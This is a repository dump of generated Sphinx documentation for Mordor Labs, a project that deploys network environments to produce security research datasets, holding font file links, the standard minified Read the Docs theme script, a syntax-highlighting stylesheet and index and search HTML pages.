/docs/build/html/_static/fonts/Lato/lato-bolditalic.woff:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/OTRF/SimuLand/18200e75af4b15914d478f0094c86e5e94fd9878/docs/build/html/_static/fonts/Lato/lato-bolditalic.woff


--------------------------------------------------------------------------------
/docs/build/html/_static/fonts/Lato/lato-bolditalic.woff2:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/OTRF/SimuLand/18200e75af4b15914d478f0094c86e5e94fd9878/docs/build/html/_static/fonts/Lato/lato-bolditalic.woff2


--------------------------------------------------------------------------------
/docs/build/html/_static/fonts/Lato/lato-italic.eot:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/OTRF/SimuLand/18200e75af4b15914d478f0094c86e5e94fd9878/docs/build/html/_static/fonts/Lato/lato-italic.eot


--------------------------------------------------------------------------------
/docs/build/html/_static/fonts/Lato/lato-italic.ttf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/OTRF/SimuLand/18200e75af4b15914d478f0094c86e5e94fd9878/docs/build/html/_static/fonts/Lato/lato-italic.ttf


--------------------------------------------------------------------------------
/docs/build/html/_static/fonts/Lato/lato-italic.woff:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/OTRF/SimuLand/18200e75af4b15914d478f0094c86e5e94fd9878/docs/build/html/_static/fonts/Lato/lato-italic.woff


--------------------------------------------------------------------------------
/docs/build/html/_static/fonts/Lato/lato-italic.woff2:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/OTRF/SimuLand/18200e75af4b15914d478f0094c86e5e94fd9878/docs/build/html/_static/fonts/Lato/lato-italic.woff2


--------------------------------------------------------------------------------
/docs/build/html/_static/fonts/Lato/lato-regular.eot:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/OTRF/SimuLand/18200e75af4b15914d478f0094c86e5e94fd9878/docs/build/html/_static/fonts/Lato/lato-regular.eot


--------------------------------------------------------------------------------
/docs/build/html/_static/fonts/Lato/lato-regular.ttf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/OTRF/SimuLand/18200e75af4b15914d478f0094c86e5e94fd9878/docs/build/html/_static/fonts/Lato/lato-regular.ttf


--------------------------------------------------------------------------------
/docs/build/html/_static/fonts/Lato/lato-regular.woff:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/OTRF/SimuLand/18200e75af4b15914d478f0094c86e5e94fd9878/docs/build/html/_static/fonts/Lato/lato-regular.woff


--------------------------------------------------------------------------------
/docs/build/html/_static/fonts/Lato/lato-regular.woff2:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/OTRF/SimuLand/18200e75af4b15914d478f0094c86e5e94fd9878/docs/build/html/_static/fonts/Lato/lato-regular.woff2


--------------------------------------------------------------------------------
/docs/build/html/_static/fonts/RobotoSlab-Bold.ttf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/OTRF/SimuLand/18200e75af4b15914d478f0094c86e5e94fd9878/docs/build/html/_static/fonts/RobotoSlab-Bold.ttf


--------------------------------------------------------------------------------
/docs/build/html/_static/fonts/RobotoSlab-Regular.ttf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/OTRF/SimuLand/18200e75af4b15914d478f0094c86e5e94fd9878/docs/build/html/_static/fonts/RobotoSlab-Regular.ttf


--------------------------------------------------------------------------------
/docs/build/html/_static/fonts/RobotoSlab/roboto-slab-v7-bold.eot:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/OTRF/SimuLand/18200e75af4b15914d478f0094c86e5e94fd9878/docs/build/html/_static/fonts/RobotoSlab/roboto-slab-v7-bold.eot


--------------------------------------------------------------------------------
/docs/build/html/_static/fonts/RobotoSlab/roboto-slab-v7-bold.ttf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/OTRF/SimuLand/18200e75af4b15914d478f0094c86e5e94fd9878/docs/build/html/_static/fonts/RobotoSlab/roboto-slab-v7-bold.ttf


--------------------------------------------------------------------------------
/docs/build/html/_static/fonts/RobotoSlab/roboto-slab-v7-bold.woff:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/OTRF/SimuLand/18200e75af4b15914d478f0094c86e5e94fd9878/docs/build/html/_static/fonts/RobotoSlab/roboto-slab-v7-bold.woff


--------------------------------------------------------------------------------
/docs/build/html/_static/fonts/RobotoSlab/roboto-slab-v7-bold.woff2:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/OTRF/SimuLand/18200e75af4b15914d478f0094c86e5e94fd9878/docs/build/html/_static/fonts/RobotoSlab/roboto-slab-v7-bold.woff2


--------------------------------------------------------------------------------
/docs/build/html/_static/fonts/RobotoSlab/roboto-slab-v7-regular.eot:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/OTRF/SimuLand/18200e75af4b15914d478f0094c86e5e94fd9878/docs/build/html/_static/fonts/RobotoSlab/roboto-slab-v7-regular.eot


--------------------------------------------------------------------------------
/docs/build/html/_static/fonts/RobotoSlab/roboto-slab-v7-regular.ttf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/OTRF/SimuLand/18200e75af4b15914d478f0094c86e5e94fd9878/docs/build/html/_static/fonts/RobotoSlab/roboto-slab-v7-regular.ttf


--------------------------------------------------------------------------------
/docs/build/html/_static/fonts/RobotoSlab/roboto-slab-v7-regular.woff:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/OTRF/SimuLand/18200e75af4b15914d478f0094c86e5e94fd9878/docs/build/html/_static/fonts/RobotoSlab/roboto-slab-v7-regular.woff


--------------------------------------------------------------------------------
/docs/build/html/_static/fonts/RobotoSlab/roboto-slab-v7-regular.woff2:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/OTRF/SimuLand/18200e75af4b15914d478f0094c86e5e94fd9878/docs/build/html/_static/fonts/RobotoSlab/roboto-slab-v7-regular.woff2


--------------------------------------------------------------------------------
/docs/build/html/_static/fonts/fontawesome-webfont.eot:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/OTRF/SimuLand/18200e75af4b15914d478f0094c86e5e94fd9878/docs/build/html/_static/fonts/fontawesome-webfont.eot


--------------------------------------------------------------------------------
/docs/build/html/_static/fonts/fontawesome-webfont.ttf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/OTRF/SimuLand/18200e75af4b15914d478f0094c86e5e94fd9878/docs/build/html/_static/fonts/fontawesome-webfont.ttf


--------------------------------------------------------------------------------
/docs/build/html/_static/fonts/fontawesome-webfont.woff:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/OTRF/SimuLand/18200e75af4b15914d478f0094c86e5e94fd9878/docs/build/html/_static/fonts/fontawesome-webfont.woff


--------------------------------------------------------------------------------
/docs/build/html/_static/fonts/fontawesome-webfont.woff2:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/OTRF/SimuLand/18200e75af4b15914d478f0094c86e5e94fd9878/docs/build/html/_static/fonts/fontawesome-webfont.woff2


--------------------------------------------------------------------------------
/docs/build/html/_static/js/theme.js:
--------------------------------------------------------------------------------
1 | /* sphinx_rtd_theme version 0.4.3 | MIT license */
2 | /* Built 20190212 16:02 */
3 | require=function r(s,a,l){function c(e,n){if(!a[e]){if(!s[e]){var i="function"==typeof require&&require;if(!n&&i)return i(e,!0);if(u)return u(e,!0);var t=new Error("Cannot find module '"+e+"'");throw t.code="MODULE_NOT_FOUND",t}var o=a[e]={exports:{}};s[e][0].call(o.exports,function(n){return c(s[e][1][n]||n)},o,o.exports,r,s,a,l)}return a[e].exports}for(var u="function"==typeof require&&require,n=0;n<l.length;n++)c(l[n]);return c}({"sphinx-rtd-theme":[function(n,e,i){var jQuery="undefined"!=typeof window?window.jQuery:n("jquery");e.exports.ThemeNav={navBar:null,win:null,winScroll:!1,winResize:!1,linkScroll:!1,winPosition:0,winHeight:null,docHeight:null,isRunning:!1,enable:function(e){var i=this;void 0===e&&(e=!0),i.isRunning||(i.isRunning=!0,jQuery(function(n){i.init(n),i.reset(),i.win.on("hashchange",i.reset),e&&i.win.on("scroll",function(){i.linkScroll||i.winScroll||(i.winScroll=!0,requestAnimationFrame(function(){i.onScroll()}))}),i.win.on("resize",function(){i.winResize||(i.winResize=!0,requestAnimationFrame(function(){i.onResize()}))}),i.onResize()}))},enableSticky:function(){this.enable(!0)},init:function(i){i(document);var t=this;this.navBar=i("div.wy-side-scroll:first"),this.win=i(window),i(document).on("click","[data-toggle='wy-nav-top']",function(){i("[data-toggle='wy-nav-shift']").toggleClass("shift"),i("[data-toggle='rst-versions']").toggleClass("shift")}).on("click",".wy-menu-vertical .current ul li a",function(){var n=i(this);i("[data-toggle='wy-nav-shift']").removeClass("shift"),i("[data-toggle='rst-versions']").toggleClass("shift"),t.toggleCurrent(n),t.hashChange()}).on("click","[data-toggle='rst-current-version']",function(){i("[data-toggle='rst-versions']").toggleClass("shift-up")}),i("table.docutils:not(.field-list,.footnote,.citation)").wrap("<div class='wy-table-responsive'></div>"),i("table.docutils.footnote").wrap("<div class='wy-table-responsive footnote'></div>"),i("table.docutils.citation").wrap("<div class='wy-table-responsive citation'></div>"),i(".wy-menu-vertical ul").not(".simple").siblings("a").each(function(){var e=i(this);expand=i('<span class="toctree-expand"></span>'),expand.on("click",function(n){return t.toggleCurrent(e),n.stopPropagation(),!1}),e.prepend(expand)})},reset:function(){var n=encodeURI(window.location.hash)||"#";try{var e=$(".wy-menu-vertical"),i=e.find('[href="'+n+'"]');if(0===i.length){var t=$('.document [id="'+n.substring(1)+'"]').closest("div.section");0===(i=e.find('[href="#'+t.attr("id")+'"]')).length&&(i=e.find('[href="#"]'))}0<i.length&&($(".wy-menu-vertical .current").removeClass("current"),i.addClass("current"),i.closest("li.toctree-l1").addClass("current"),i.closest("li.toctree-l1").parent().addClass("current"),i.closest("li.toctree-l1").addClass("current"),i.closest("li.toctree-l2").addClass("current"),i.closest("li.toctree-l3").addClass("current"),i.closest("li.toctree-l4").addClass("current"),i[0].scrollIntoView())}catch(o){console.log("Error expanding nav for anchor",o)}},onScroll:function(){this.winScroll=!1;var n=this.win.scrollTop(),e=n+this.winHeight,i=this.navBar.scrollTop()+(n-this.winPosition);n<0||e>this.docHeight||(this.navBar.scrollTop(i),this.winPosition=n)},onResize:function(){this.winResize=!1,this.winHeight=this.win.height(),this.docHeight=$(document).height()},hashChange:function(){this.linkScroll=!0,this.win.one("hashchange",function(){this.linkScroll=!1})},toggleCurrent:function(n){var e=n.closest("li");e.siblings("li.current").removeClass("current"),e.siblings().find("li.current").removeClass("current"),e.find("> ul li.current").removeClass("current"),e.toggleClass("current")}},"undefined"!=typeof window&&(window.SphinxRtdTheme={Navigation:e.exports.ThemeNav,StickyNav:e.exports.ThemeNav}),function(){for(var r=0,n=["ms","moz","webkit","o"],e=0;e<n.length&&!window.requestAnimationFrame;++e)window.requestAnimationFrame=window[n[e]+"RequestAnimationFrame"],window.cancelAnimationFrame=window[n[e]+"CancelAnimationFrame"]||window[n[e]+"CancelRequestAnimationFrame"];window.requestAnimationFrame||(window.requestAnimationFrame=function(n,e){var i=(new Date).getTime(),t=Math.max(0,16-(i-r)),o=window.setTimeout(function(){n(i+t)},t);return r=i+t,o}),window.cancelAnimationFrame||(window.cancelAnimationFrame=function(n){clearTimeout(n)})}()},{jquery:"jquery"}]},{},["sphinx-rtd-theme"]);


--------------------------------------------------------------------------------
/docs/build/html/_static/minus.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/OTRF/SimuLand/18200e75af4b15914d478f0094c86e5e94fd9878/docs/build/html/_static/minus.png


--------------------------------------------------------------------------------
/docs/build/html/_static/mordor-apt29-design.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/OTRF/SimuLand/18200e75af4b15914d478f0094c86e5e94fd9878/docs/build/html/_static/mordor-apt29-design.png


--------------------------------------------------------------------------------
/docs/build/html/_static/mordor-shire-design.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/OTRF/SimuLand/18200e75af4b15914d478f0094c86e5e94fd9878/docs/build/html/_static/mordor-shire-design.png


--------------------------------------------------------------------------------
/docs/build/html/_static/plus.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/OTRF/SimuLand/18200e75af4b15914d478f0094c86e5e94fd9878/docs/build/html/_static/plus.png


--------------------------------------------------------------------------------
/docs/build/html/_static/pygments.css:
--------------------------------------------------------------------------------
 1 | .highlight .hll { background-color: #ffffcc }
 2 | .highlight  { background: #f8f8f8; }
 3 | .highlight .c { color: #408080; font-style: italic } /* Comment */
 4 | .highlight .err { border: 1px solid #FF0000 } /* Error */
 5 | .highlight .k { color: #008000; font-weight: bold } /* Keyword */
 6 | .highlight .o { color: #666666 } /* Operator */
 7 | .highlight .ch { color: #408080; font-style: italic } /* Comment.Hashbang */
 8 | .highlight .cm { color: #408080; font-style: italic } /* Comment.Multiline */
 9 | .highlight .cp { color: #BC7A00 } /* Comment.Preproc */
10 | .highlight .cpf { color: #408080; font-style: italic } /* Comment.PreprocFile */
11 | .highlight .c1 { color: #408080; font-style: italic } /* Comment.Single */
12 | .highlight .cs { color: #408080; font-style: italic } /* Comment.Special */
13 | .highlight .gd { color: #A00000 } /* Generic.Deleted */
14 | .highlight .ge { font-style: italic } /* Generic.Emph */
15 | .highlight .gr { color: #FF0000 } /* Generic.Error */
16 | .highlight .gh { color: #000080; font-weight: bold } /* Generic.Heading */
17 | .highlight .gi { color: #00A000 } /* Generic.Inserted */
18 | .highlight .go { color: #888888 } /* Generic.Output */
19 | .highlight .gp { color: #000080; font-weight: bold } /* Generic.Prompt */
20 | .highlight .gs { font-weight: bold } /* Generic.Strong */
21 | .highlight .gu { color: #800080; font-weight: bold } /* Generic.Subheading */
22 | .highlight .gt { color: #0044DD } /* Generic.Traceback */
23 | .highlight .kc { color: #008000; font-weight: bold } /* Keyword.Constant */
24 | .highlight .kd { color: #008000; font-weight: bold } /* Keyword.Declaration */
25 | .highlight .kn { color: #008000; font-weight: bold } /* Keyword.Namespace */
26 | .highlight .kp { color: #008000 } /* Keyword.Pseudo */
27 | .highlight .kr { color: #008000; font-weight: bold } /* Keyword.Reserved */
28 | .highlight .kt { color: #B00040 } /* Keyword.Type */
29 | .highlight .m { color: #666666 } /* Literal.Number */
30 | .highlight .s { color: #BA2121 } /* Literal.String */
31 | .highlight .na { color: #7D9029 } /* Name.Attribute */
32 | .highlight .nb { color: #008000 } /* Name.Builtin */
33 | .highlight .nc { color: #0000FF; font-weight: bold } /* Name.Class */
34 | .highlight .no { color: #880000 } /* Name.Constant */
35 | .highlight .nd { color: #AA22FF } /* Name.Decorator */
36 | .highlight .ni { color: #999999; font-weight: bold } /* Name.Entity */
37 | .highlight .ne { color: #D2413A; font-weight: bold } /* Name.Exception */
38 | .highlight .nf { color: #0000FF } /* Name.Function */
39 | .highlight .nl { color: #A0A000 } /* Name.Label */
40 | .highlight .nn { color: #0000FF; font-weight: bold } /* Name.Namespace */
41 | .highlight .nt { color: #008000; font-weight: bold } /* Name.Tag */
42 | .highlight .nv { color: #19177C } /* Name.Variable */
43 | .highlight .ow { color: #AA22FF; font-weight: bold } /* Operator.Word */
44 | .highlight .w { color: #bbbbbb } /* Text.Whitespace */
45 | .highlight .mb { color: #666666 } /* Literal.Number.Bin */
46 | .highlight .mf { color: #666666 } /* Literal.Number.Float */
47 | .highlight .mh { color: #666666 } /* Literal.Number.Hex */
48 | .highlight .mi { color: #666666 } /* Literal.Number.Integer */
49 | .highlight .mo { color: #666666 } /* Literal.Number.Oct */
50 | .highlight .sa { color: #BA2121 } /* Literal.String.Affix */
51 | .highlight .sb { color: #BA2121 } /* Literal.String.Backtick */
52 | .highlight .sc { color: #BA2121 } /* Literal.String.Char */
53 | .highlight .dl { color: #BA2121 } /* Literal.String.Delimiter */
54 | .highlight .sd { color: #BA2121; font-style: italic } /* Literal.String.Doc */
55 | .highlight .s2 { color: #BA2121 } /* Literal.String.Double */
56 | .highlight .se { color: #BB6622; font-weight: bold } /* Literal.String.Escape */
57 | .highlight .sh { color: #BA2121 } /* Literal.String.Heredoc */
58 | .highlight .si { color: #BB6688; font-weight: bold } /* Literal.String.Interpol */
59 | .highlight .sx { color: #008000 } /* Literal.String.Other */
60 | .highlight .sr { color: #BB6688 } /* Literal.String.Regex */
61 | .highlight .s1 { color: #BA2121 } /* Literal.String.Single */
62 | .highlight .ss { color: #19177C } /* Literal.String.Symbol */
63 | .highlight .bp { color: #008000 } /* Name.Builtin.Pseudo */
64 | .highlight .fm { color: #0000FF } /* Name.Function.Magic */
65 | .highlight .vc { color: #19177C } /* Name.Variable.Class */
66 | .highlight .vg { color: #19177C } /* Name.Variable.Global */
67 | .highlight .vi { color: #19177C } /* Name.Variable.Instance */
68 | .highlight .vm { color: #19177C } /* Name.Variable.Magic */
69 | .highlight .il { color: #666666 } /* Literal.Number.Integer.Long */


--------------------------------------------------------------------------------
/docs/build/html/genindex.html:
--------------------------------------------------------------------------------
  1 | 
  2 | 
  3 | 
  4 | <!DOCTYPE html>
  5 | <!--[if IE 8]><html class="no-js lt-ie9" lang="en" > <![endif]-->
  6 | <!--[if gt IE 8]><!--> <html class="no-js" lang="en" > <!--<![endif]-->
  7 | <head>
  8 |   <meta charset="utf-8">
  9 |   
 10 |   <meta name="viewport" content="width=device-width, initial-scale=1.0">
 11 |   
 12 |   <title>Index &mdash; Mordor Labs 0.1 documentation</title>
 13 |   
 14 | 
 15 |   
 16 |   
 17 |   
 18 |   
 19 | 
 20 |   
 21 |   <script type="text/javascript" src="_static/js/modernizr.min.js"></script>
 22 |   
 23 |     
 24 |       <script type="text/javascript" id="documentation_options" data-url_root="./" src="_static/documentation_options.js"></script>
 25 |         <script src="_static/jquery.js"></script>
 26 |         <script src="_static/underscore.js"></script>
 27 |         <script src="_static/doctools.js"></script>
 28 |         <script src="_static/language_data.js"></script>
 29 |     
 30 |     <script type="text/javascript" src="_static/js/theme.js"></script>
 31 | 
 32 |     
 33 | 
 34 |   
 35 |   <link rel="stylesheet" href="_static/css/theme.css" type="text/css" />
 36 |   <link rel="stylesheet" href="_static/pygments.css" type="text/css" />
 37 |     <link rel="index" title="Index" href="#" />
 38 |     <link rel="search" title="Search" href="search.html" /> 
 39 | </head>
 40 | 
 41 | <body class="wy-body-for-nav">
 42 | 
 43 |    
 44 |   <div class="wy-grid-for-nav">
 45 |     
 46 |     <nav data-toggle="wy-nav-shift" class="wy-nav-side">
 47 |       <div class="wy-side-scroll">
 48 |         <div class="wy-side-nav-search" >
 49 |           
 50 | 
 51 |           
 52 |             <a href="index.html" class="icon icon-home"> Mordor Labs
 53 |           
 54 | 
 55 |           
 56 |           </a>
 57 | 
 58 |           
 59 |             
 60 |             
 61 |           
 62 | 
 63 |           
 64 | <div role="search">
 65 |   <form id="rtd-search-form" class="wy-form" action="search.html" method="get">
 66 |     <input type="text" name="q" placeholder="Search docs" />
 67 |     <input type="hidden" name="check_keywords" value="yes" />
 68 |     <input type="hidden" name="area" value="default" />
 69 |   </form>
 70 | </div>
 71 | 
 72 |           
 73 |         </div>
 74 | 
 75 |         <div class="wy-menu wy-menu-vertical" data-spy="affix" role="navigation" aria-label="main navigation">
 76 |           
 77 |             
 78 |             
 79 |               
 80 |             
 81 |             
 82 |               <p class="caption"><span class="caption-text">Environments:</span></p>
 83 | <ul>
 84 | <li class="toctree-l1"><a class="reference internal" href="environments/attack_evals.html">ATT&amp;CK Evals</a></li>
 85 | <li class="toctree-l1"><a class="reference internal" href="environments/windows.html">Windows</a></li>
 86 | </ul>
 87 | 
 88 |             
 89 |           
 90 |         </div>
 91 |       </div>
 92 |     </nav>
 93 | 
 94 |     <section data-toggle="wy-nav-shift" class="wy-nav-content-wrap">
 95 | 
 96 |       
 97 |       <nav class="wy-nav-top" aria-label="top navigation">
 98 |         
 99 |           <i data-toggle="wy-nav-top" class="fa fa-bars"></i>
100 |           <a href="index.html">Mordor Labs</a>
101 |         
102 |       </nav>
103 | 
104 | 
105 |       <div class="wy-nav-content">
106 |         
107 |         <div class="rst-content">
108 |         
109 |           
110 | 
111 | 
112 | 
113 | 
114 | 
115 | 
116 | 
117 | 
118 | 
119 | 
120 | 
121 | 
122 | 
123 | 
124 | 
125 | <div role="navigation" aria-label="breadcrumbs navigation">
126 | 
127 |   <ul class="wy-breadcrumbs">
128 |     
129 |       <li><a href="index.html">Docs</a> &raquo;</li>
130 |         
131 |       <li>Index</li>
132 |     
133 |     
134 |       <li class="wy-breadcrumbs-aside">
135 |         
136 |             
137 |         
138 |       </li>
139 |     
140 |   </ul>
141 | 
142 |   
143 |   <hr/>
144 | </div>
145 |           <div role="main" class="document" itemscope="itemscope" itemtype="http://schema.org/Article">
146 |            <div itemprop="articleBody">
147 |             
148 | 
149 | <h1 id="index">Index</h1>
150 | 
151 | <div class="genindex-jumpbox">
152 |  
153 | </div>
154 | 
155 | 
156 |            </div>
157 |            
158 |           </div>
159 |           <footer>
160 |   
161 | 
162 |   <hr/>
163 | 
164 |   <div role="contentinfo">
165 |     <p>
166 |         &copy; Copyright 2020, Roberto Rodriguez @Cyb3rWard0g
167 | 
168 |     </p>
169 |   </div>
170 |   Built with <a href="http://sphinx-doc.org/">Sphinx</a> using a <a href="https://github.com/rtfd/sphinx_rtd_theme">theme</a> provided by <a href="https://readthedocs.org">Read the Docs</a>. 
171 | 
172 | </footer>
173 | 
174 |         </div>
175 |       </div>
176 | 
177 |     </section>
178 | 
179 |   </div>
180 |   
181 | 
182 | 
183 |   <script type="text/javascript">
184 |       jQuery(function () {
185 |           SphinxRtdTheme.Navigation.enable(true);
186 |       });
187 |   </script>
188 | 
189 |   
190 |   
191 |     
192 |    
193 | 
194 | </body>
195 | </html>


--------------------------------------------------------------------------------
/docs/build/html/index.html:
--------------------------------------------------------------------------------
  1 | 
  2 | 
  3 | <!DOCTYPE html>
  4 | <!--[if IE 8]><html class="no-js lt-ie9" lang="en" > <![endif]-->
  5 | <!--[if gt IE 8]><!--> <html class="no-js" lang="en" > <!--<![endif]-->
  6 | <head>
  7 |   <meta charset="utf-8">
  8 |   
  9 |   <meta name="viewport" content="width=device-width, initial-scale=1.0">
 10 |   
 11 |   <title>Welcome to Mordor Labs &mdash; Mordor Labs 0.1 documentation</title>
 12 |   
 13 | 
 14 |   
 15 |   
 16 |   
 17 |   
 18 | 
 19 |   
 20 |   <script type="text/javascript" src="_static/js/modernizr.min.js"></script>
 21 |   
 22 |     
 23 |       <script type="text/javascript" id="documentation_options" data-url_root="./" src="_static/documentation_options.js"></script>
 24 |         <script src="_static/jquery.js"></script>
 25 |         <script src="_static/underscore.js"></script>
 26 |         <script src="_static/doctools.js"></script>
 27 |         <script src="_static/language_data.js"></script>
 28 |     
 29 |     <script type="text/javascript" src="_static/js/theme.js"></script>
 30 | 
 31 |     
 32 | 
 33 |   
 34 |   <link rel="stylesheet" href="_static/css/theme.css" type="text/css" />
 35 |   <link rel="stylesheet" href="_static/pygments.css" type="text/css" />
 36 |     <link rel="index" title="Index" href="genindex.html" />
 37 |     <link rel="search" title="Search" href="search.html" />
 38 |     <link rel="next" title="ATT&amp;CK Evaluations" href="environments/attack_evals.html" /> 
 39 | </head>
 40 | 
 41 | <body class="wy-body-for-nav">
 42 | 
 43 |    
 44 |   <div class="wy-grid-for-nav">
 45 |     
 46 |     <nav data-toggle="wy-nav-shift" class="wy-nav-side">
 47 |       <div class="wy-side-scroll">
 48 |         <div class="wy-side-nav-search" >
 49 |           
 50 | 
 51 |           
 52 |             <a href="#" class="icon icon-home"> Mordor Labs
 53 |           
 54 | 
 55 |           
 56 |           </a>
 57 | 
 58 |           
 59 |             
 60 |             
 61 |           
 62 | 
 63 |           
 64 | <div role="search">
 65 |   <form id="rtd-search-form" class="wy-form" action="search.html" method="get">
 66 |     <input type="text" name="q" placeholder="Search docs" />
 67 |     <input type="hidden" name="check_keywords" value="yes" />
 68 |     <input type="hidden" name="area" value="default" />
 69 |   </form>
 70 | </div>
 71 | 
 72 |           
 73 |         </div>
 74 | 
 75 |         <div class="wy-menu wy-menu-vertical" data-spy="affix" role="navigation" aria-label="main navigation">
 76 |           
 77 |             
 78 |             
 79 |               
 80 |             
 81 |             
 82 |               <p class="caption"><span class="caption-text">Environments:</span></p>
 83 | <ul>
 84 | <li class="toctree-l1"><a class="reference internal" href="environments/attack_evals.html">ATT&amp;CK Evals</a></li>
 85 | <li class="toctree-l1"><a class="reference internal" href="environments/windows.html">Windows</a></li>
 86 | </ul>
 87 | 
 88 |             
 89 |           
 90 |         </div>
 91 |       </div>
 92 |     </nav>
 93 | 
 94 |     <section data-toggle="wy-nav-shift" class="wy-nav-content-wrap">
 95 | 
 96 |       
 97 |       <nav class="wy-nav-top" aria-label="top navigation">
 98 |         
 99 |           <i data-toggle="wy-nav-top" class="fa fa-bars"></i>
100 |           <a href="#">Mordor Labs</a>
101 |         
102 |       </nav>
103 | 
104 | 
105 |       <div class="wy-nav-content">
106 |         
107 |         <div class="rst-content">
108 |         
109 |           
110 | 
111 | 
112 | 
113 | 
114 | 
115 | 
116 | 
117 | 
118 | 
119 | 
120 | 
121 | 
122 | 
123 | 
124 | 
125 | <div role="navigation" aria-label="breadcrumbs navigation">
126 | 
127 |   <ul class="wy-breadcrumbs">
128 |     
129 |       <li><a href="#">Docs</a> &raquo;</li>
130 |         
131 |       <li>Welcome to Mordor Labs</li>
132 |     
133 |     
134 |       <li class="wy-breadcrumbs-aside">
135 |         
136 |             
137 |             <a href="_sources/index.rst.txt" rel="nofollow"> View page source</a>
138 |           
139 |         
140 |       </li>
141 |     
142 |   </ul>
143 | 
144 |   
145 |   <hr/>
146 | </div>
147 |           <div role="main" class="document" itemscope="itemscope" itemtype="http://schema.org/Article">
148 |            <div itemprop="articleBody">
149 |             
150 |   <div class="section" id="welcome-to-mordor-labs">
151 | <h1>Welcome to Mordor Labs<a class="headerlink" href="#welcome-to-mordor-labs" title="Permalink to this headline">¶</a></h1>
152 | <p>Cloud Templates and scripts to deploy network environments <strong>exclusively</strong> to generate datasets for the <a class="reference external" href="https://mordordatasets.com">Mordor project</a>.</p>
153 | <div class="section" id="liability-responsible-usage">
154 | <h2>Liability / Responsible Usage<a class="headerlink" href="#liability-responsible-usage" title="Permalink to this headline">¶</a></h2>
155 | <p>This content is <strong>ONLY</strong> to be used to create research opportunities and generate datasets for the <a class="reference external" href="https://mordordatasets.com">Mordor project</a>.</p>
156 | <div class="toctree-wrapper compound">
157 | <p class="caption"><span class="caption-text">Environments:</span></p>
158 | <ul>
159 | <li class="toctree-l1"><a class="reference internal" href="environments/attack_evals.html">ATT&amp;CK Evals</a><ul>
160 | <li class="toctree-l2"><a class="reference internal" href="environments/evals/apt29.html">APT29</a></li>
161 | </ul>
162 | </li>
163 | <li class="toctree-l1"><a class="reference internal" href="environments/windows.html">Windows</a><ul>
164 | <li class="toctree-l2"><a class="reference internal" href="environments/windows/shire.html">Shire</a></li>
165 | </ul>
166 | </li>
167 | </ul>
168 | </div>
169 | </div>
170 | </div>
171 | 
172 | 
173 |            </div>
174 |            
175 |           </div>
176 |           <footer>
177 |   
178 |     <div class="rst-footer-buttons" role="navigation" aria-label="footer navigation">
179 |       
180 |         <a href="environments/attack_evals.html" class="btn btn-neutral float-right" title="ATT&amp;CK Evaluations" accesskey="n" rel="next">Next <span class="fa fa-arrow-circle-right"></span></a>
181 |       
182 |       
183 |     </div>
184 |   
185 | 
186 |   <hr/>
187 | 
188 |   <div role="contentinfo">
189 |     <p>
190 |         &copy; Copyright 2020, Roberto Rodriguez @Cyb3rWard0g
191 | 
192 |     </p>
193 |   </div>
194 |   Built with <a href="http://sphinx-doc.org/">Sphinx</a> using a <a href="https://github.com/rtfd/sphinx_rtd_theme">theme</a> provided by <a href="https://readthedocs.org">Read the Docs</a>. 
195 | 
196 | </footer>
197 | 
198 |         </div>
199 |       </div>
200 | 
201 |     </section>
202 | 
203 |   </div>
204 |   
205 | 
206 | 
207 |   <script type="text/javascript">
208 |       jQuery(function () {
209 |           SphinxRtdTheme.Navigation.enable(true);
210 |       });
211 |   </script>
212 | 
213 |   
214 |   
215 |     
216 |    
217 | 
218 | </body>
219 | </html>


--------------------------------------------------------------------------------
/docs/build/html/objects.inv:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/OTRF/SimuLand/18200e75af4b15914d478f0094c86e5e94fd9878/docs/build/html/objects.inv


--------------------------------------------------------------------------------
/docs/build/html/search.html:
--------------------------------------------------------------------------------
  1 | 
  2 | 
  3 | <!DOCTYPE html>
  4 | <!--[if IE 8]><html class="no-js lt-ie9" lang="en" > <![endif]-->
  5 | <!--[if gt IE 8]><!--> <html class="no-js" lang="en" > <!--<![endif]-->
  6 | <head>
  7 |   <meta charset="utf-8">
  8 |   
  9 |   <meta name="viewport" content="width=device-width, initial-scale=1.0">
 10 |   
 11 |   <title>Search &mdash; Mordor Labs 0.1 documentation</title>
 12 |   
 13 | 
 14 |   
 15 |   
 16 |   
 17 |   
 18 | 
 19 |   
 20 |   <script type="text/javascript" src="_static/js/modernizr.min.js"></script>
 21 |   
 22 |     
 23 |       <script type="text/javascript" id="documentation_options" data-url_root="./" src="_static/documentation_options.js"></script>
 24 |         <script src="_static/jquery.js"></script>
 25 |         <script src="_static/underscore.js"></script>
 26 |         <script src="_static/doctools.js"></script>
 27 |         <script src="_static/language_data.js"></script>
 28 |         <script src="_static/searchtools.js"></script>
 29 |     
 30 |     <script type="text/javascript" src="_static/js/theme.js"></script>
 31 | 
 32 |     
 33 | 
 34 |   
 35 |   <link rel="stylesheet" href="_static/css/theme.css" type="text/css" />
 36 |   <link rel="stylesheet" href="_static/pygments.css" type="text/css" />
 37 |     <link rel="index" title="Index" href="genindex.html" />
 38 |     <link rel="search" title="Search" href="#" /> 
 39 | </head>
 40 | 
 41 | <body class="wy-body-for-nav">
 42 | 
